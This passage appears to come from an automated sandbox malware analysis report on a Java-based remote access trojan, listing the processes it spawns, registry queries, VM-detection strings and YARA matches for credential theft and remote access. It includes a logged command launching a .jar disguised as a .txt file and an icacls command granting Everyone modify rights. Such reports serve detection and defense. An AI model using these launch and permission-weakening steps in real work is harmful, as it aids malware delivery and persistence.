Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000000.00000003.2159978751.0000021CF8956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000003.2174179696.000000001506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3429336455.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02AE63B4 LdrInitializeThunk, 2_2_02AE63B4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02AD03C0 cpuid 2_2_02AD03C0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\4524 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000002.3431081605.000000000A169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR